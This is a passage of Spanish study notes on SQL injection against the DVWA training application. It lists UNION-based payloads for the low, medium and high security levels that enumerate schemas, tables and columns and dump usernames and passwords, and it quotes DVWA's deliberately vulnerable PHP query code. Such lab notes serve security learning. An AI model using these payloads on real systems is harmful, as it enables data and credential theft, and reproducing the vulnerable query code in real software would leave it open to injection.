a' UNION SELECT schema_name, "2" FROM information_schema.schemata;-- -
LISTAR TABLAS:
a' UNION SELECT table_name, "2" FROM information_schema.tables; -- -
LISTAR COLUMNAS:
a' UNION SELECT column_name, "2 FROM information_schema.columns;-- -
LISTAR USUARIOS:
a' UNION SELECT first_name, password FROM dvwa.users; -- -
Medium Security Level
Malas practicas de seguridad.
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>
(CON BURSUITE)
LISTAR BASE DE DATOS:
id= 1 UNION SELECT schema_name, version() FROM information_schema.schemata;- -
LISTAR TABLAS:
id= 1 UNION SELECT table_name, version() FROM information_schema.tables;- -
LSITAR COLUMNAS:
id= 1 UNION SELECT column_name, version() FROM information_schema.columns;- -
LISTAR USUARIOS:
id= 1 UNION SELECT user, password FROM dvwa.users;- -
High Security Level
Malas prácticas más duras o alternativas.
<?php
if( isset( $_SESSION [ 'id' ] ) ) {
// Get input
$id = $_SESSION[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
SIMILAR al Low Security Level.
LISTAR BASE DE DATOS:
a' UNION SELECT schema_name, "2" FROM information_schema.schemata;-- -
LISTAR TABLAS:
a' UNION SELECT table_name, "2" FROM information_schema.tables; -- -
LSITAR COLUMNAS:
a' UNION SELECT column_name, "2 FROM information_schema.columns;-- -
LISTAR USUARIOS:
a' UNION SELECT first_name, password FROM dvwa.users; -- -
